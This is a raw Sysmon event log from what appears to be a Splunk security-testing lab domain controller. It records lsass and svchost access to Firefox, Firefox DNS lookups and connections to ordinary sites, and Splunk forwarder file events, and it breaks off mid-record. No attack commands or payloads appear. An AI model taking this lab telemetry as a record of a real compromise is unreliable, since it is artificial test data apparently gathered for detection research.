Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.047{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000287902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:25.032{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.1.48319158C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000287901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.016{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+eb71a2|C:\Program Files\Mozilla Firefox\xul.dll+b937e2|C:\Program Files\Mozilla Firefox\xul.dll+270212|C:\Program Files\Mozilla Firefox\xul.dll+26ffea|C:\Program Files\Mozilla Firefox\xul.dll+ecf9af|C:\Program Files\Mozilla Firefox\xul.dll+1b32ca7|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b36276|C:\Program Files\Mozilla Firefox\xul.dll+1788539|C:\Program Files\Mozilla Firefox\xul.dll+1787a03|C:\Program Files\Mozilla Firefox\xul.dll+c2f818|C:\Program Files\Mozilla Firefox\xul.dll+25dda1|C:\Program Files\Mozilla Firefox\xul.dll+34f4de|C:\Program Files\Mozilla Firefox\xul.dll+ccce66|C:\Program Files\Mozilla Firefox\xul.dll+1778103|C:\Program Files\Mozilla Firefox\xul.dll+170f378 23542300x8000000000000000216748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:26.155{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE8897D542CB66AC5FB19645CB383D9,SHA256=6A796687C0D1992FF076AD1F940EE71A3E31EECEBFB199C7ACD9EB2FB4AD99D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.353{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50963- 354300x8000000000000000288239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.350{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56660- 354300x8000000000000000288238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.336{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60409- 354300x8000000000000000288237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.336{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58405- 354300x8000000000000000288236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.335{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53458-false216.58.212.170ams15s22-in-f10.1e100.net443https 354300x8000000000000000288235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.334{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53345- 354300x8000000000000000288234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.334{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57928- 354300x8000000000000000288233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.331{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58874- 354300x8000000000000000288232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.227{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53457-false143.204.98.29server-143-204-98-29.fra50.r.cloudfront.net443https 354300x8000000000000000288231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.140{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53456-false18.66.139.17server-18-66-139-17.fra60.r.cloudfront.net443https 354300x8000000000000000288230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.137{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52749- 354300x8000000000000000288229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.136{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60247- 354300x8000000000000000288228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.135{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53455-false2.22.118.162a2-22-118-162.deploy.static.akamaitechnologies.com80http 354300x8000000000000000288227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.134{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57616- 354300x8000000000000000288226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.132{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60304- 354300x8000000000000000288225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.130{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52680- 354300x8000000000000000288224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.104{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53454-false143.204.98.29server-143-204-98-29.fra50.r.cloudfront.net443https 354300x8000000000000000288223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.104{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55939- 354300x8000000000000000288222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.103{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53922- 23542300x8000000000000000288221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.699{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\search.json.mozlz4MD5=69D8B81E0C70F46FC632A6651C8F0114,SHA256=4EC26C54FC638C47D9522EF811685D428C9AAD65799FC43036C41C3BC858805D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.100{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53453-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 354300x8000000000000000288219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.099{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60848- 354300x8000000000000000288218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.053{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53452-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 354300x8000000000000000288217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.049{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52783- 354300x8000000000000000288216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.012{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53451-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 354300x8000000000000000288215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.012{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52118- 354300x8000000000000000288214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.012{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59849- 354300x8000000000000000288213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.007{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57485- 22542200x8000000000000000288212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.765{C8EA50B7-11AA-6216-1605-000000003802}2228github.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.764{C8EA50B7-11AA-6216-1605-000000003802}2228splunk.github.io02606:50c0:8001::153;2606:50c0:8002::153;2606:50c0:8003::153;2606:50c0:8000::153;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.749{C8EA50B7-11AA-6216-1605-000000003802}2228splunk.github.io0185.199.109.153;185.199.111.153;185.199.110.153;185.199.108.153;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.749{C8EA50B7-11AA-6216-1605-000000003802}2228github.com0140.82.121.3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.749{C8EA50B7-11AA-6216-1605-000000003802}2228github.com0::ffff:140.82.121.3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.749{C8EA50B7-11AA-6216-1605-000000003802}2228research.splunk.com0type: 5 splunk.github.io;::ffff:185.199.108.153;::ffff:185.199.109.153;::ffff:185.199.111.153;::ffff:185.199.110.153;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.389{C8EA50B7-11AA-6216-1605-000000003802}2228cs9.wac.phicdn.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.386{C8EA50B7-11AA-6216-1605-000000003802}2228cs9.wac.phicdn.net093.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.369{C8EA50B7-11AA-6216-1605-000000003802}2228prod.ingestion-edge.prod.dataops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.367{C8EA50B7-11AA-6216-1605-000000003802}2228prod.ingestion-edge.prod.dataops.mozgcp.net034.120.208.123;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.154{C8EA50B7-11AA-6216-1605-000000003802}2228a1887.dscq.akamai.net02a02:26f0:1700:f::1737:a194;2a02:26f0:1700:f::1737:a1a4;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.154{C8EA50B7-11AA-6216-1605-000000003802}2228d2nxq2uap88usk.cloudfront.net02600:9000:225e:d000:a:da5e:7900:93a1;2600:9000:225e:3e00:a:da5e:7900:93a1;2600:9000:225e:4a00:a:da5e:7900:93a1;2600:9000:225e:f800:a:da5e:7900:93a1;2600:9000:225e:e000:a:da5e:7900:93a1;2600:9000:225e:4c00:a:da5e:7900:93a1;2600:9000:225e:8a00:a:da5e:7900:93a1;2600:9000:225e:3400:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.150{C8EA50B7-11AA-6216-1605-000000003802}2228d2nxq2uap88usk.cloudfront.net018.66.139.125;18.66.139.67;18.66.139.97;18.66.139.17;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.147{C8EA50B7-11AA-6216-1605-000000003802}2228a1887.dscq.akamai.net02.22.117.227;2.22.118.162;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.146{C8EA50B7-11AA-6216-1605-000000003802}2228r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:2.22.118.162;::ffff:2.22.117.227;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.062{C8EA50B7-11AA-6216-1605-000000003802}2228example.org093.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.061{C8EA50B7-11AA-6216-1605-000000003802}2228example.org0::ffff:93.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.030{C8EA50B7-11AA-6216-1605-000000003802}2228prod.detectportal.prod.cloudops.mozgcp.net02600:1901:0:38d7::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.026{C8EA50B7-11AA-6216-1605-000000003802}2228prod.detectportal.prod.cloudops.mozgcp.net034.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.022{C8EA50B7-11AA-6216-1605-000000003802}2228detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;::ffff:34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000288192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.499{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22253E80E4EB4AF1F56A230631CE3DF9,SHA256=0C8675173F84B8DC736D59C3C8A34181A296D9CF3102543BDB4862A1AECB1864,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.446{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1581AA0E5876CE97DED5A7A81E8889D,SHA256=447653B20627B019D24F6F04AC6D475FB83601AB8545F5DF4AEC968DEEF1D657,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.415{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.415{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.399{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AE-6216-1C05-000000003802}5564C:\Program Files\Mozilla 